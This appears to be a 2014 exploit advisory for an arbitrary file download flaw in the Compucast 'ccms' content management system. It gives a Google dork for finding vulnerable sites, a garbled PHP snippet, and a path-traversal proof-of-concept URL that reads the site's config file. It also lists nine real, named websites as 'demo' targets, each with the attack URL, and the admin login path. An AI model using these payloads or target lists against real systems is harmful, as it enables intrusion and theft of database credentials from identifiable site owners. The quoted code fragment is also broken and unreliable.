facebook facebook twitter rss

ccms Compucast Web Media All rights reserved <= Arbitrary File Download

Author: wlhaan hacker , Published: 15-09-2014
######################
# Exploit Title : ccms Compucast Web Media All rights reserved <= Arbitrary File Download

# Exploit Author : wlhaan hacker

# Vendor Homepage : http://www.compucast.com

# Dork

#"Site designed & maintained by Compucast Web, Inc."

# Date : 2014-09-3



######################

Vulnerable code:
<?php
$file 
$_POST['download'];
<?
php
include($_SERVER['DOCUMENT_ROOT']."/ccms.config.php");
include(
$source_path."/ccms.functions.php");
include(
$source_path."/ccms.init.php")
?>



######################

# PoC

http://victim/path/ccms/includes/download.php?file=../../ccms.config.php


# demo

http://www.21stamendmentlalouisiane.com/ccms/includes/download.php?file=../../ccms.config.php

http://www.kreweofboo.com/ccms/includes/download.php?file=../../ccms.config.php

http://www.905royalhotel.com/ccms/includes/download.php?file=../../ccms.functions.php

www.lahma.org/ccms/includes/download.php?file=../../ccms.config.php

www.westafricacatering.com/ccms/includes/download.php?file=../../ccms.config.php

www.marianites.org/ccms/includes/download.php?file=../../ccms.config.php

www.pelicanneworleans.com/ccms/includes/download.php?file=../../ccms.config.php

www.clinicaltrialsmgt.com/ccms/includes/download.php?file=../../ccms.config.php

www.frenchmarketrestaurant.com/ccms/includes/download.php?file=../../ccms.config.php


#####################
admin login


http://victim/admin/login.php

#####################



Discovered By : wlhaan hacker
http://www.v4-team/
iit@hotmail.com


https://twitter.com/waleedal3ybani

#####################

Like us on Facebook :